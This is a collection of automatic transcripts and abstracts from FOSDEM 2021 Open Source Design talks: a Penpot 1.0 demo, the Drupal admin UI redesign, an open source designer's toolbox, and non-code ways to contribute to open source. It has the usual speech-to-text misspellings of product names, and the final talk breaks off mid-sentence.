Take 23. No, I was kidding. Okay, so let's do this. Welcome to the talk on Penpot. It's my pleasure to be back on FOSDEM, whether it's Face to Face or online, to give you a nice follow-up on what we've been doing throughout 2020. At the time, it was not called Penpot. That was something we decided a few months ago. Initially, the code name was UXBox. What we wanted to do is to bring to free and open source ecosystem a professional platform for designers and creative people to be able to do all sort of prototyping and design. Particularly meant for digital products, like interfaces or any sort of design that is meant to then be printed or interacted with, if it's an app or a website or whatever. Our idea is there are too many proprietary tools out there that do a fine job. It's tempting to decide that since the open source arena doesn't provide me as a designer with a tool that I can use professionally and work together with other members of my team in a diverse and cross-functional team, I'll make an exception. While other people are using all sorts of open source tools, I'll have to admit and concede that I need to use, whether it's Sketch or FICMA or Envision. We decided, no way, we're going to make sure that we have a proper outstanding super professional platform, the likes of perhaps Blender in 3D modeling, but for prototyping and design. So a year has passed and now we're ready to announce what we promised. We promised back then that we would be giving you sort of an alpha or a 1.0 or MVP, whatever you want to call it, the first public release that you can work with. You can trust that it's actually stable and has a lot of features and of course it still has to do, we have a huge roadmap ahead, but you can already enjoy and be productive with, which is critical for that first impression. Should I be able to use this or would I like to depend on this tool? We wanted a resounding yes on that first impression. That's a tough yes, because when do you stop actually developing a tool for that 1.0 that has to give you that feeling of a finished product and still a lot of potential. We think we have achieved that. Actually we did some extra work, we didn't think we were able to do in this time and also the pandemic, so all in all I think we are in a quite great moment. I'm going to share the screen now for you to enjoy. I'm going to do a commentary voice. I'm going to show you a quick demo while I tell. This is Pembot, so welcome to 1.0. This is for a pre-recorded session. That was Juan, one of the lead designers and founders of Pembot. He's going to offer an alternative design of the Forstem website. Just an example, what would we do? Let's contribute to Forstem, even if it's just an exercise, probably futile, but it's just something that you can relate to. This is a very Forstem-oriented presentation as you can already feel. Here what you're seeing is we have the canvas. Canvas comes with grids and alignment and all sorts of tools and objects that you can add. Of course you can add text, there's a lot of things going on here. Images, the Forstem 21 there, is not a text obviously. What Juan is doing is very quickly using the grid system and the intelligent alignment system and all the proportions and sizes and widths and everything. Pembot is helping him to see whether things are aligned or the appropriate relationship or the ratio. Now he's using the free tool like paths to draw shapes. You can see your left all the layers. Some of them he will probably be renaming. It's not path 4 or path 3, but it's actually a proper unique name because it has an entity. Here he's using that, color management, the translucency, opacity, shadowing. I think he actually rotated some stuff, reported the radios there. Now he's just imported from his image library, the Forstem logo, multiple selection and drag and drop movement. He's switching between visible grid and hidden grid, so he always has a one click away view of what's going on, how it's going to look. We wanted to make sure that people coming to Pembot would feel that all the useful suspects in terms of user patterns were there. The learning curve is really not steep. There's some familiarity with other tools that people use. We think it's very important that people feel productive from day one, particularly designers do value their ideas, their assumptions, their imagination really is able to be fleshed out rather quickly. The tool is an extension of themselves sometimes. They might feel frustrated if they cannot conceive something at the speed of their imagination. We make sure that Pembot, even if we have some own ideas on how things should work as a prototyping and design tool, we wanted to make sure people found themselves in familiar territory. The super minute interactions that make a difference, like the way I'm using the mouse, the reaction, the feedback of the tool is exactly what I would expect. We hope that you find Pembot very much as an extension of your own hand or body or mind. Here you see we have a lot of text transformation, duplicate objects with all its internal layers to speed up some work. Typography and text in general was a challenge because remember we are using SVG. SVG is our storage. SVG is a standard, it's an open standard, it's a pretty strong standard, but it's not being used by the competition, by all the platforms. They are using their proprietary formats. We decided that we wanted to pursue open standards also in files and formats and storage. So we are using SVG, but that came with its own challenges and one of them was definitely text management. So we had to come with very smart workarounds to still use SVG and have all the potential and capabilities of HTML and CSS. You've seen here how well we've felt. I think we managed to do some text wrapping and all that. It's really not that easy when you're using SVG. So this is of course not the speed at which Juan typically works. He's slowing things down a bit. This is one when I was worth of work, I speed at about six seconds I think. But he's doing this for the first time, he's just doing a nice forced-in website. He's really productive. He developed Pempot so he knows how to use all the little options. But he's also quite exquisite. At the moment we can say that Pempot team is using now Pempot for development design Pempot itself. So things that we are not showing here is the design system support for Pempot. So you can actually have files and canvas, you know, assets that can be then have this ripple effect that you change one thing, one definition, one color, one property in one item. But since that is considered a main component, the parent one, all the children will immediately be affected as long as you want it to be. Pempot will always tell you, hey, the parent item has changed and you are using these inheritance in this design. Would you like those changes to be applied here? So you know what's going on. Here you can see some gradients, color management, not only the color picker, but the color management. We're really, really proud of how fast and easy to use this. We wanted to make sure that every time you make any small change, you see all the different ratios and proportions being shown to you. So you get that second. So here is the, yeah, now he's duplicated a canvas. This is for the about page. So he mostly now has to get rid of stuff. So multiple selection, delete, bam, gone. And he will now add some, you see, very, you know, out of contextual dialogues, of course, the moment you select the tool, you get those extra dialogues that are relevant only for that tool. Sometimes you see, you see at the bottom, the color palette. We borrowed that idea from the great tool that it's in scape, which is a different kind of beats, you know, multi-purpose, victor, victorial platform. You can do a lot of stuff with the escape. And one of the things we like the most is the way they handle the color palette. And that color product actually grows. It is somehow keeping track of all the colors that you're using in case you want to just again go back and say, I like the purple. Thank you for now. That's the prototyping. So of course, we want to make sure that you can do this interactive prototyping with links and I click, I click again and show. And I want to show you here one of the things that we're most proud of all the code around the, you know, all the properties around any, any element. But of course, also the CSS and the SVG. Everything here, everything you've seen is actually code. We're not translating. We're not doing anything like some, yeah, some translation into SVG or CSS. This is native, native storage. You know, this is, this is our choice. This is our agenda. This is how we lobby for open standards. We're using SVG and CSS as an easy translation. After that, we're going to show you comments, you know, we're slowing things down a bit. So you get notifications for comments. We need to have this stuff because it's, it's, it's all about teamwork and workflows and conversation. And this is pretty, you know, this is standard in the, in the industry at the moment. So you can navigate through all the comments. And also if you go to the prototype and activate comments, you can see also, you know, overlaid the comments and you can interact and do stuff also on prototype level, which is very typical for stakeholders. This will be the multi-user. And this is going to actually be the last part of the demo or the Surrealized demo. Here you can see three users at the top. You see three icons. And so three people are working here together, although you only see two at the moment. That's one and Andy. And from one's perspective, he's working, he's doing, he's aware of Andy's presence. And also he's aware of what he's doing more or less. I mean, things are in a way a bit transactional. So the moment that Andy, you know, clicks, enter or just whatever is when, when you actually see that, that change applied to the, to the shared canvas. Okay. So this was pretty much what I wanted to show you in terms of the platform. You cannot have that without team collaboration. And that means private management and all the things that come with permissions and inviting people and having shared drafts and all that. So I didn't show you that because that is a challenge to do, to, to make it right. But, you know, the exciting stuff lies, lies in the, in the canvas and the prototype and the low code and the common system and the multi user simultaneous multi real time user thing. We just released this, you know, it's a few days after we actually released 1.0. We want to, we wanted to launch the official Pemport on premise Docker image. This is important for us because everything is, is so versus the service at the moment. We want to, yeah, of course, provide services, but we want people to download this and use it locally. They want in the laptops or in their, in their service or whatever. And we want to continue to develop features to bridge the existing gap between established design apps like, yeah, the ones I already mentioned, because we want to make less and less likely that someone will dismiss Penport upon first use. So for us, it's very important that particularly designers that the first impression should be good enough for them to say, okay, I'm going to continue to trust this for some days and see how it goes. We want to also very privately, you know, which pursue some migration migration success stories from the competition. Yeah, so we want to, to hear from people saying I was using Figma and I'm using Pemport. I'm very glad that I did because blah, blah, blah, you know, please tell us and share those stories. Any migration is going to be good for the open source ecosystem and, and the community to know about those, those stories. So that would be great. So we try and pursue those migration success stories. We want to work on SVG import so that you can edit any SVG you're importing from other tools and do it like it's really very modular. And so, and that's a challenge to accept SVG from other tools, you know, SVG sometimes gets messy depending on the tool. We want to add Boolean operations with, you know, across elements. We want to have some sort of file management also. We want to also be able to import files from competitors like Figma files or Sketch files and see we can do some transformation and import that with, you know, acceptable loss of information. We also want to, you saw the prototype, the interactive prototype where you were linking items to paints and things. And then you have the typical click and then you go, you go there. That's fine. But we want to give more, more advanced interactions. And, and also we want to work on Tiger and Pempot integrations. So this is, this is Tiger. Well, actually, this is two screens of Tiger. And this is, this is the Kanban with zoom out, very compact and expanded. This is basically this is Tiger six. We also released this a few days ago. Tiger is all about agile project management is open source. We've been doing this for, for a few years now. And we feel that they make, I mean, we are the developers of Tiger, we are the developers and creators of Pempot. So it made sense that we would have some sort of bundle some integration. We haven't, I mean, there's some low hanging fruit in terms of features and integrations like I will close an issue while I was in Pompempot. Or I will create a new design through a new user story on Tiger, you know, things like that. Those are pretty simple and straightforward. We want to think more creatively because we think it's all about the process, the workflow and team collaboration. And we think those two tools suit a match together really nicely. So yeah, this is Tiger six. You probably already heard about this, but you can, you can go to Tiger.io and check this out. This is the spring. This is the scrum. And, you know, also different zoom levels for spring task port that they will be the screens for during a sprint. So if you didn't know about Tiger, go and check it. Integration with Git repositories so that every design, every SVG code that you have, it's also being synchronized with a Git repository so you can go back and forth, Git repository, Pompempot. Perhaps you want to edit the SVG on the Git repository and you see the new color popping up on the Pompempot interface, you know. And of course, related to that actively manage community contributions because we feel a lot of plugins and ideas will come from the community. And that is that's probably, you know, going to take the rest of the year. And that's it. So call to action. There's two things we would like to ask you. One, just try it out and pass what an article or view tells what we think, you know, spread the word if you feel like it. You can send a DMAIL, you know, we want to know your opinion on this. And also the second thing, trying it out, writing about it, sharing about Pompempot would be what do you want us to develop, you know, or what do you think you could contribute, you know, whether it's features or assets, because we feel it's going to be also a lot of open source design stuff, just assets like creativity, like logos, shapes, icons, you know, with all the SVG love or, or bitmap, you know. And so we will like to know what do you think, you know, what should be doing next. And we need to know from you, we will actively, you know, doing polls and all that, but feel free to tell us how a roadmap should look like in the foreseeable future. So this was it, you know, thank you very much for your time. I hope you like what we've developed over the this year. We continue to work full time, you know, full speed, really, really exciting year ahead. Thank you very much. Thank you for some.
|
Penpot (formerly UXBOX) is an Open Source online design & prototyping platform with the aim of bringing the whole team to the design process. Penpot is multiplatform (web based) and based on open standards (SVG). The platform provides a set of tools meant not only for designers but also for developers and stakeholders. Design, prototype, feedback system, handoff specifications and low-code among them. We will share our vision, Penpot’s current state and our next challenges about the project. We will also perform a demo and hope to contribute to the already open channel between FOSS and Design.
|
10.5446/53615 (DOI)
|
Hello and welcome to my talk, redesign of an established open source CMS. My name is Sascha Eckenberger, I'm a senior UX designer at UNIC and I'm one of the lead designers of the Drupal design system. I'm with the Drupal community for almost nine years now and you can find me with the handle at Sascha Eckenberger on most social media like Twitter, Drupal, Dribble and so on. So today I want to talk or give you like a brief history of Drupal, then talk about the redesign of the admin UI of Drupal, then I have some takeaways for you and last but not least I can take some of your questions. So let's dive in. Drupal is an open source CMS or sometimes called CMF content management framework or content management system which was first released 19 years ago. So it's quite an old timer, you know, of all the CMSs but it got a lot of improvements over the years. The last major release is Drupal 9 which was released June last year, so June 2020. The Drupal community counts almost 1.4 million members from which around 120,000 are active contributors. Compared to that huge number only a few people consider themselves designer in this community and are active contributors over a longer period of time. So I want to take you just down the memory lane beginning with the UI of Drupal 7 because I think that's from Drupal 7 on it's most relevant to what you will see today. So we'll skip Drupal 1 to 6. Here we go. So Drupal 7 was released in January 2011 and it featured a completely new UI. So this was the UI when it was launched in 2011. As you can see nowadays we will consider it quite uninspirational but back then it was one of the more modern and nicer mini-UIs out there. Then with the introduction of Drupal 8 in November 2015 the admin theme was a bit revised but basically as you can see here in the screenshot the design language was taken over from 7 and was just improved but there was no big redesign going on between Drupal 7 and 8. And with the introduction of Drupal 9 in June 2020 of last year as you can see it's not a fault. Basically the default admin UI stayed exactly the same as on Drupal 8. It still uses the so-called 7 theme. And yeah so this is basically where we are today. I want to show you some more screenshots. So what you can see here is the content overview. So when you log in this is like an editor view so you have all the notes, all the content in this list. You know you have some actions above and let's go to the next screenshot. This is basically the editor experience you get out of the box from Drupal with some fields like a text field, a wizarding field and some other fields there, some media as you can see and meta information. Another screenshot is this. This is basically the managed field UI where you just have a table with a list of fields which you can edit with the actions, the operations on the right. And last but not least you can see here this is basically the configuration overview where you have like the overview of all the different subsections of the configuration menu which uses this layout here. So this is the current state of how basically Drupal looks when you just do a fresh install. No matter if it's Drupal 8 or 9 you will get the same experience out of the box. Just from a visual point of view of course. So I think it's fair to say that Drupal didn't have a design refreshing in recent years. The focus was heavily under the hood with the switch to symphony, the PHP framework symphony. There were some API first approaches implemented, a new template engine called twig was used. There were a lot of things going on in terms of headless. And yeah, but it didn't receive like a refresh in terms of design. So basically the design token stayed the same for quite a long time. This is a quote I found on the internet. The Drupal admin UI looks outdated. You will find similar quotes basically everywhere on the internet. So there was basically an outcry that Drupal stayed the same and all the under the hood improvements weren't basically acknowledged in the visual terms, right? Because in the visual design language we basically stayed behind the competition. But from a technical point of view Drupal is quite on par with other solutions or superior to other solutions out there. There was an initiative called the admin UI and JavaScript modernization initiative. That was basically founded around I think three years ago, if I remember correctly. And the goal was to basically give some brief, some fresh air into the admin UI. This is just as some context information of, you know, for the designs and some design clues we see in the progress now. So the redesign. So let's dive in. The principles of the Drupal design system as we call it are those. So in a nutshell basically we have precise shapes and strong contrast. We give empathy to what matters. We use hierarchy to explain the relation between elements. We use predictable patterns and each element should serve a clear purpose. We also want to make, you know, or we want to appeal to the greatest possible number of people and we want to ensure that visual style is extensible and flexible all over the design system. Accessibility is our main concern and we're heavily accessibility driven. So I would call the design system accessibility first if you want so. I want to just share one screenshot with you. As you can see, we basically defined a distinguished color for focus. So for each element, the user can focus. We have like this green board around it and this color is not used anywhere else than just for focus. But in terms of accessibility, of course, a lot more takes into account like a spacing and contrast and so on, right? I think I could give an own talk when it comes to accessibility, but we will just like keep it short for today. The typography is basically on a modular scale. So we use a modular scale to keep the rhythm across UI texts consistent. This is the scale, as you can see here. As a base font size, we use like 1 RAM or 16 pixel in most browsers. And for colors, we have very little colors defined. We use this vivid blue absolute zero color for accents and for more important UI elements like primary actions and so on. And the rest of the colors are basically more gray tones or grayish colors. And the secondary color, the red, green and yellow are basically used for messaging, like messages, system messages and success messages and so on. You can find more about the design system at this URL. There are also a lot of resources online and other talks which deep dive into the design system. So check that out if you're more interested in the design system part. Claro. Claro is basically the first fruit out of the design system. And this is basically what it looks like when everything from the design system comes together. As you can see, compared to the designs of Drupal 7, we use more like it has more air to breathe. So we use more spacing, but also like the different elements are more consistent and you have clear call to actions. This is the content editor form. As you can see here as well, some elements with a visceric field, some configuration and this is the configuration overview. So Claro, this is basically the name of this new admin theme. It's included in Drupal course in Drupal 8.8 as an experimental theme. So it's not finished yet. So we flag it as experimental. It's not activated by default. You need to manually activate it. It's planned that Claro gets a stable release with Drupal 9.2, which is out in around mid-next year. You will find us at Drupal.org slash Slack. The two channels, MNUI and MNUI Design are the ones we use for communication. So feel free to join there. This is just as I mentioned the first fruit out of the design system. The next step will be, I want to show you some designs which we call it internally the future UI. So this whole thing started as a customization layer for Claro exactly one year ago and it serves as an ideation for Claro. And this is how it looks like. So this is the login. This is the overview we saw. As you can see, we use a vertical navigation approach. We have the call to actions always sticky at the top right. So we have a sticky portion. It's a clean up UI. We use different layers to combine different UI elements which belong together. This is the editor view. So we edit content as well. It's way cleaner. We have a real sidebar with all the meta information there. We have a sticky safe button at the top and the configuration overview, the re-empt media library and we have a lot of options. You can set whatever accent color you like. You can use your own one. You can use branding, replace the logo with your brand, like with your brand, with your own brand or your client's brand. And we have a lot of other customization options. So it could look like this when we use another accent color or you could go all in and use the built in dark mode. Another thing which we really look at is contextual information. So information that appears when you need it and is not in the way in the UI all the time, as you can see in the example. Here we used it for quick actions, for bulk select, which is only needed if you select more than one item. So that's just a short example. So major Drupal distributions already use this Chin theme as their default admin UI. It's available for download as a country theme at Drupal.org slash project class Chin. So you can go and download and test drive it today. Feel free to contribute to everything as you saw today to Chin or Claro. Everything is open and everybody is welcome to contribute to. So the takeaways. We have a heavy focus on accessibility. Claro is on track to get stable with Drupal 9.2 and Chin further improves the overall experience. You will find more as I mentioned before in-depth talks about the admin UI online all over the place from different speakers. And I want to mention this because this is the most important one. It's a community effort. So thanks to all contributors. There are a lot of them and without every single contribution, this wouldn't be possible. Thank you. Are there any questions? I guess we are going to be live in a few seconds or minutes. Okay. So questions. Yeah. Basically one of the audiences of us, do I have to learn PHP language to use Drupal? Yeah. So the answer is if you're a user, no, you don't have to. If you're a designer or a front-end engineer, you don't have to. If you want to do back-end stuff, then well, guess yes, you have to because it's written in PHP. So yes and no, depends on what you want to do. Okay. So another question is how long and how many people to create the design system? So the design system is now in the making for, let me think, two and a half years, three years maybe. And there are a lot of people which are basically on and off. So there were a lot of designers joining for a couple of months, so weeks and then leaving again. But basically like the core is maybe like four or five designers which are around for a longer period and a lot of other designers are just basically hopping in and on and off. But I think that's totally fine in open source anyway. So yeah, it depends a bit. Okay. So Belen is asking what kind of user research was done while designing the new UI? There were many user researches done. So there was a survey which was basically, there was one survey which was basically made for content editors. So for large, like in large organizations which use Drupal, like governments and stuff like that. And then there was another survey made for agencies and you know, like builders. So we gather basically feedbacks on the needs of people who build sites with Drupal and with people who use the site in the end. Because until now it was heavily driven by the community and the creators and not for the actual users in the end, like the end users, the content editors and you know, like site administrators. So there's quite some shift in focusing on the end user. Sounds good. I guess that the bot lords will cut off the video any minute. So we probably can take another question, but this talk room will get public after this talk so anyone can hop into the room and then join the video call to ask more questions. So Ariel was asking what is the secret Drupal design has for keeping up with the design volunteer contributions? There is no special secret because I think we didn't crack the code for that yet. As I mentioned before, there are a lot of people who are basically like hopping on and off. So yeah, I'm also looking for that secret or special secret codes. If you know it, let me know. I guess we shouldn't take another question to avoid getting cut off in the middle. I will try to answer all the other questions in the chat.
|
In this session I'll talk about the brief history of Drupal & the Drupal interface, how it has evolved and why this redesign is an important step for the future of Drupal. As it's important to being inclusive and we treat this as a key value in the Drupal community we made inclusivity & accessibility the main priority. I will dive into the Design System, the principles behind it and the new interfaces which are based off this Design System: Claro The new, upcoming default admin experience. Gin The so-called "Future UI" – which started as a pure vision and is now available as a contrib theme which you can use today.
|
10.5446/53616 (DOI)
|
Hi everyone, welcome to FOSDEM 2021 Open Source Design Dev Room. My name is Abigail McCorrell and I will be talking to you about the Open Source Designers to the box. Basically, recommended techniques and tools for Open Source Designers. Now when I thought about speaking on this topic, I had no idea how I was going to structure this toolbox because there is a variety of information and resources that are relevant to designers contributing to Open Source. So I have this idea to keep it simple and just make it something that every Open Source designer can refer to when thinking of their own strategy for contributing to Open Source. So we would start by trying to understand what Open Source Designers is all about and this is basically how I have defined this. It involves introducing creative problem-solving processes to projects that are free and open to read, modify and share. So it is really Open Source plus design and while preparing these presentations, of course, I searched for a definition of Open Source Design but it's not surprising that I didn't find a lot of information on that because Open Source Design is an emerging space and it is nice to see more people get interested in what designers are doing and can do for Open Source software. So this is how I understand Open Source Design and I hope that it has captured the concept of making Open Source Design contributions. So now that we know what OSD is about, what should you know as an Open Source designer? Well, you should know how to communicate just by virtue of being a designer. You can already expect that there will be barriers to participating in the Open Source community. This is because Open Source is more focused on programming and coding and that is how it has been for a while. So there is a lot of tech juggling that most designers don't understand like IRC, GitHub or Git or version control. These things are not terms that designers are familiar with and that can be quite discouraging but you should know as a designer how to communicate and present your ideas, put them forward or put yourself forward in a way that you can build your identity and help people get to know you, understand your ideas and hopefully get your ideas accepted. So when you post messages in the team chat or you have conversations with other team members, you want to make sure your messages are comprehensible, make sure people can understand what you're asking about and you also want to make sure you've done good research beforehand so you don't weigh down other team members. So making sure your messages are easy to understand helps it, makes it easier for people to respond to you quickly and want to offer their help and all of this helps you to get integrated into the community. So beyond community, I think also know how to engage and become a part of the community. It shouldn't be one-sided, you know, always seeking advice or feedback, give back to the open source community. Now most of these communities have events that they have scheduled regularly so try to attend those events because you get to network with other members on your team. You can also give feedback and also get feedback from these team members and very important too is the fact that you can suggest improvements for the team or for the project, you know, how to make it better. These events really give you an opportunity to do so. So trying to become a part of the community really helps you to build an identity for yourself as we mentioned earlier. That identity definitely facilitates your contribution or your work. So definitely know how to contribute. This is what many designers look forward to when they ask about contributing to open source design. Just getting into the mitigations of the design work and that is great. If you're just going into open source design, you can explore some good first design issues like conducting a unistic evaluation of the project user interface. You can design empathy maps and personas based on any existing user research data. It really helps to get other team members in the room and help them understand who the project is being designed for and put themselves in their shoes. You can design sticker sheets or style guides or design systems which help the design team to work together, collaborate and really helps the project design to be more consistent, to have a more consistent look and feel. And if you're more visual design inclined, then you can definitely design some branding assets, logos, t-shirts, things that can help the brand image of the project to really stand out. Before I come to document, one thing I'm making contributions is in open source, it's always quality over quantity. So you don't want to be the first to make so many design contributions that don't really make sense or that don't add any value to the project. So make sure you're solving a problem and trying to solve for that problem. It's always about the quality, the value you can do about that project. It's not just for the sake of contributing or opening design issues and all that. So document, document, as designers we document everything because we know we definitely cannot rely on our human will, maybe we can easily forget what design decisions were made and when or even why they were made. So we want to make sure that our design deliverables are presented and documented effectively. Some ways you can do that are by taking advantage of design labels. So the project already uses design labels, that is, it groups design issues based on categories like UX, UI, branding, research. Design labels really help to organize these design issues for others who may be looking to contribute in the future. And if the project doesn't already use design labels, then you can make that suggestion. You should also check if the project has a file, a contributing.mg file for design, somewhere that designers can visit to see how they can make design contributions and how to get started and the points of contact. So you can always look up for that. You can claim design issues on GitHub as design challenges and this just means providing more context or information about that issue. So what is the problem you're trying to solve? Who are you solving this problem for? Who are you designing for? What solution or solutions are you exploring and how can you tell if those solutions are effective? How would you test the solution to see that it is successful? Adding this extra information to your design issues basically helps to give more background information and helps anyone to understand what the designer was thinking when they set up this challenge and it could know easily how to contribute to the problem or to the issue being solved. You should also use issue threads. So every design issue on GitHub would have a thread where conversations are not issue and maintain. So you don't need to take the conversation out of that thread but if you do, you want to add some pointers to that conversation in the thread because those threads are really useful for documenting progress and updates and decisions that were made on that issue. So issue threads are really a nice way to document progress on design issues. One thing I always encourage designers to do is to annotate their sketches and why it brings all user flows. So when you make those diagrams, you want to put some little notes that can help anyone understand what the process is and that way anyone can make a contribution or can give you valuable feedback, they don't even have to be designers because those notes are pretty much explained clearly and those notes can actually help you document the effects you put doing that. You should also explore there are a lot of free and open source tools and resources for you that you can use in your work. You can get free assets and all that but as you search, you want to understand the different types of licenses for these assets. Are they permissive licenses or not? Do they require attribution or not? So you should understand the different types of creative commons licenses so that you can very carefully use these assets because if you don't, you end up putting not just yourself at risk for the entire project. So you want to make sure that the assets you are using are well-licensed and you are able to use those assets in your work or in the project. So I have included a link to a webpage that explains the different types of creative commons assets that you should definitely look at. Grow. The great thing about open source design is it gives designers an opportunity to expand and to grow in their career so you can take part in open source internships or projects like Google Summer Code or Outreach which really gives designers the opportunity to contribute to open source. And it's a great experience because not only do you get to make meaningful contributions to actual open source projects but you get to interact with the community and see what it is like. You get to present your work and receive feedback or criticism on your work and you already get used to the whole open source phase. So you should definitely look out for that. And because we know that open source design is just coming off, you can advocate and let more people know about it and how to contribute to open source as designers. We definitely love to see more designers get involved in open source and make open source software more usable. So all of this will help you expand your portfolio not just as an open source designer but as a designer in general and that is really great for your career. So here are some tools and leaves that I have included for your reference. Some paper are some of my favorite tools in design but you can also use solve like trial.io for diagramming like your user flows and site maps. Figma and Adobe XP are prototyping tools that you can use for open source projects but it really depends on what tool has already been adopted for that project. So if a certain tool is already in use you want to try as much as possible to stick to that so that other team members can be on the same page with you. The choice of prototyping tool like I mentioned really does depend on what is already in use but if you feel something else will be better then you need to suggest it to the project maintainer. Panso is a free and open source prototyping tool that I just discovered. I think it's interesting and you can definitely check it out. Mixcape is a vector graphics editor but it's also free and open source. Lender is a free and open source 3D graphics tool. GIMP is a data manipulation and editing software that is also open source and free. And SynthVib is a 2D animation tool that's free and open source as well. These are just a few of the free and open source tools that are available for your use as an open source designer so you don't have to use that in expensive software just to contribute to open source. These tools are readily available and all the links you find here when you get the slides you can actually just click on them and you can take them to the web page for that tool or project. So these are some reads that I found pretty interesting. This paper on various space by new commons to open source projects would really help you understand some of those things you can expect as you start to get into the open source space and how you can overcome those challenges. Various designers is also a very nice article for designers and also for open source project maintenance it helps them see how they can encourage more designers to contribute to their open source projects. So here's the link to the 10 usability statistics you can use when conducting heuristic evaluations for an open source project UI. Some tools that is tools for better thinking. It's really nice for developing your problem solving and thinking capability as a designer and you should definitely check that out. Checklist design is a collection of checklists that help you make sure you're not forgetting any important elements when designing screens for your open source project. And open design now is a book that talks about open design which is a very similar concept to open source design. So reading this book would help you understand the future of design and open design as it is. And here's the link to CC licenses that help you understand different types of creative licenses and creative commons licenses are available and how you can take advantage of each one. So the great part is you can find more of these links on opensourcedesign.net slash resources. I feel this is a gold mine for every open source designer and it's definitely something that you should check out. You'll find a lot of free tools and resources that you can use in your work. So thanks to these amazing people. We have all these beautiful images I have showcased in my presentation and the resources were obtained from opensourcedesign.net. So thank you to these amazing people and thank you for listening to me while I talk to the open source designers toolbox. I hope that you will find some of these resources and tools beneficial and valuable in your work and I hope they encourage you to continue in your open source design career. You can find me on Twitter at abigel underscore mark or you can visit my website abigelmarkuru.com where you can find links to my other social media profile. So thank you for listening and I really do look forward to seeing more designers contribute to open source. Let's make open source more beautiful and usable. Thanks. Okay, the Q&A should be starting soon. I'm looking at the main room. Lots of claps. Okay, we are in the main room. We have a, there is a first question. It is, what are some good resources to find background images for websites and also icons? Do you have any recommendations, Abby? Yes, I would recommend on flash and text-a-bay and there is also the creative commons gallery. So I think there are links to that in my presentation slides as well. So there is a lot actually. Please, just stay with me. So lots of praise coming in for your talk and the presentation, like the layout of the presentation. I have a question if nobody else has a question. What do you want to see more of from designers in open source, Abby? I'd love to see more programs encouraging designers to contribute. So we have GSOC and outreach and as of the last time I checked out, I noticed there were a lot of projects for developers but not as many for designers and that was from very encouraging. So seeing more projects and programs like that, I'd also like to see more conversations between designers and contributors to a particular project and I'd also love to see more designers work collaboratively with other designers on projects that are just open design. I'd definitely love to see more of that. For sure. Yeah, me too. I cannot agree more about that last point about more designers collaborating together. We might get cut off really soon. So we're going to have a little bit of a break.
|
As designers get introduced to FOSS, what should they know? What techniques and tools would they need, and why? This talk will explore a recommended guide to developing a productive open source design workflow.
|
10.5446/53617 (DOI)
|
Okay, yeah. Good day everyone. My name is Isaac. I'm a visual designer from Nigeria. Yeah, I love skating. I love planting. Yeah, that's what I like. And my hobbies are swimming. So today, let's jump into what we have today. And currently, I'm so excited to be speaking at 421. It's like a dream come true. Like I've been anticipating for this. And at now, Zahir Zia-Shirini starts on a bigger platform. I'm so glad. I'm happy and it's exciting for me because I've been in the open source space for like a year and a half. And it's like a dream come true because I wasn't expecting this. I was thinking that I should be like four to five years, you know, or 10 years in open source for me to have this chance to speak. And enlighten people. So, yeah, thanks to PISO, Jamie, thanks to Eryo Fox, Samson Godi, for making me know about open source because I never knew about open source until I met these amazing folks. Okay, let's dive into what we had today. Okay, I'll be sharing my thoughts about ways you can contribute to open source project with that right in lines of code. Okay, like you should all know that there is this misconception that when you're contributing to open source, all you have to do is write codes. Like, and that has cared like a lot of Nigerian design, I don't know, let's say African designers away from open source projects because the field that all like, there's only for me to contribute. I just designed as those guys are also push code and all, you know, I'm not a front end web developer. I don't think they'll be needing me on. I had this thought until I got to meet Eryo Fox and I attended the Oscar first event. You know, so right now I'm so happy to be sharing my thoughts about this. And I will tell you that we can go to opens like let's say amazing ways you can go to open source projects without writing lines of code like it won't be able to open your visual studio code before you can call it to open source. Okay, so let's get started. Yeah, get this first one is writing documentation. So documentation is very important when you're working on open source project it helps to keep track of the progress, you know, you have to make this information accessible for all users, and for them to explore and guide them in the future, you know, if you're working on open source projects, we'll be working on them forever and you have to document the process is so that whenever some other person that committed towards the boots, you know, yeah, they can't understand the kind of friends from. Okay, so like the next one will be identifying books. So please, I'm really sorry if I'm kind of fast. I have to do this because I chose like a little time for this. Okay, this one is identifying books. Okay. So that is very important to fix books before you put it up or the software live. So this is where you come in. You know, you check if her up is going to like misbehave when he's been launched or when he's on demo. So, is as an open source contributor, you check for this, you know, you know, to avoid, avoid stories that touch in the future. The next one is kind of similar to identifying books. It's called a testing codes. So there is like a process of putting that involves execution program with the intent of like finding errors, or some issues. So a good test is very important. And when you're testing codes is very visible in the area, you know, avoid mistake, you know, when the software is very least. So if you are interested in testing codes, you know, as an open as open source code as your if a friend opens us contribution is advisable, you do this early. I make sure it's done well to avoid ask why when the software is being launched. The next one is answering queries from users. Okay, this is an interesting way of contributing to open source. You literally don't need to like open your VS code for this, or you just have to this service the bridge. Or service and opens us for the Buddha or collect some information from the pen pointers or the users. You know, this is very good because you're taking this information and getting it back to the developers in order to make the software or the app or whatever is be worked on better. You know, so this, this, if I'm this, this, this mechanism, or is a certain information is being called answer to the query. So, like, is a process where you just take issues, give it to the developer or give it to your project manager and then say, Okay, this is the, this is the issues I needed to work on this. This is where the users are crying, and these were new to fix. Okay, so the next one is moderating and organizing events. Oh, yeah, thanks to your folks. You guys made me love like, like, contributing to open source, you know, and the moderating parts organizing events is like my favorite part online. I'm a designer, but I always love to volunteer and a moderate events because it's a great platform where you get to meet amazing people, you know, you get to share inside and you're giving a platform to share your thoughts and, you know, there is no discrimination. You know, I'm so like, I don't know I am looking forward to like moderate and organize like about an event this year, and I can't wait to see that happen. Okay, so, like, meetups are a great way for open source community members to learn from each other, collaborate, you know, and they talk about some open source projects. So you can go to open source by moderating events by either hosting it or by either taking questions from the guys in the comment section and giving it to the speaker, or you can be part of the promotion guys, you know, guys are in charge of, you know, the promotion and also the social media part. Okay, so you shouldn't think that because you're not on screen, it can moderate an event, you know, it can organize an event by working on designs too. Okay. Yeah, so that's it. So examples of events, open source events and conferences. I know, I know that like a ton of them and quite many, but I know this and they are quite a few. The first one is a pie corn, the first them, the red hat summit, the Oscar first that happened last day in Nigeria, the open source summit, the open up summits, ishia, deep graphics, all things open and all scorn. Okay, these are like, like, few events and conferences, open source conferences, I know, I know like, there are tons of them, like a lot of them. And the next one will be, yeah, they're called a button to open source software is with your visual design or with an interface or with a experience skills. Yeah, you know, I got to the final doubt. I think that's most open source softwares, they're not flexible in terms of design, the, the experience is quite funny. I don't know, it can permit me saying this, like, the experience is quite funny and I use this and that's why, whenever I want to go to open source software is open source project I do it selflessly, I do it like I'm being paid for it, I do like my life depends on it. You know, so because I always want something great to come out from the open source space, you know, I want always want someone to use an open source software and be like wow this is awesome who worked on this. Okay, so if you're designed and listen to this please work on open source projects, like your life depends on it I'm not trying to like, I'm trying to use 